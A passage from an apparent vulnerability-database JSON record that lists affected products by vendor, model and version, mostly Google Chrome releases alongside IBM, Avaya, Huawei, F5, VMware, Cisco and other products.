r7.7.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.1" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.563.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.24" }, { "model": "2417-c48", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.193.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.771.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.59" }, { "model": "enterprise s-jis service", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.43" }, { "model": "diagnostic server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.8" }, { "model": "oceanstor s5500 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ipso r77.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.24" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.6" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.114" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.202" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.363.0" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.601.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.14" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.812.0" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7245" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.944.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.635.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7525061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.89" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77550" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5955" }, { "model": "oceanstor s3900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1660.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1047.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.44" }, { "model": "aura communication manager ssp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.473.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.441.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.1" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "oceanstor s5500t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1040" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1037.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.0" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.53" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.426.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.752.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.43" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.5" }, { "model": "oceanstor n8500 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.834.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.327.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.112" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "oceanstor s5800t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "t410 all-in-one rfx/hdx smart zc", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "18.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.15" }, { "model": "webex node", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.493.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.103" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.327" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.186" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.10" }, { "model": "ipso ngx r65", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.956.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.217" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491036" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.108" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.7" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system storage san768b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-384" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.522.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.38" }, { "model": "data center analytics framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.94" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.30" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.1" }, { "model": "fusioncompute v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.159" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "mirage gateway", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.152.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.556.0" }, { "model": "oceanstor vtl3500 v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.53" }, { "model": "identity engines ignition server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.161" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.772.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1059.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.29" }, { "model": "ipso r70", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.398.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.140" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.53" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.321" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.870.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1006.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.91" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.14127" }, { "model": "secure access remote access concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1653.1" }, { "model": "virtualization experience client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "62150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1083.0" }, { "model": "nexus virtual supervisor module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.301" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.335" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.695.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1021" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.325" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.732.0" }, { "model": "video distribution suite for internet streaming vds-is", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1290.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.26" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.712.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.558.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.822.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.120" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.665.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.629.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.13974" }, { "model": "oceanstor s5800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.0" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.339" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.763.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.947.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.168" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.878.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.542.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.48" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.837.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1014" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.43" }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "high-density server xh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.929.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.324" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.510.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.1549" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.410.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.787.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.323" }, { "model": "oceanstor 9000e v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.82" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.405.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.796.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.153.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": 